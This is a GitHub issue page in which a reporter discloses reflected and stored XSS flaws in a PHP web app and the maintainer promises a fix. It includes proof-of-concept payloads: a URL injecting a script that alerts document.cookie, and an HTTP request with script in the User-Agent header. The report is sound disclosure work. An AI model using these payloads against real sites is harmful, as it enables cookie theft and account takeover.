This repository has been archived by the owner on Jan 5, 2023. It is now read-only.
Multiple XSS (reflected and stored) #35
Comments
patkon
added a commit
that referenced
this issue
Aug 14, 2017
|
That fixed the issue in one of your scripts, actually you have the same problem in 36 other files that are likely to be exploitable. Another thing in acp/core/user.list.php: Leads to two xss:
Furthermore: |
|
Thank you for reporting. I will fix this as soon as possible and release 1.4.7 |
patkon
added a commit
that referenced
this issue
Aug 16, 2017
patkon
added a commit
that referenced
this issue
Aug 16, 2017
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
Hey,
I found 2 XSS in your application:
1. Reflected XSS in index.php / user_management.php
Your user_management.php is vulnerable to reflected xss

http://127.0.0.1/index.php/%22%3C/a%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
This is because you use $_SERVER['PHP_SELF'] to build links.
This is verified with the github version as well as with Version: 1.4.6
2. Stored XSS in logfile
Version 1.4.6 from your website is also vulnerable to stored xss by the following request:
GET /index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: <script>alert(123)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1
This is triggered when the administrator opens the log view.

Cheers
The text was updated successfully, but these errors were encountered: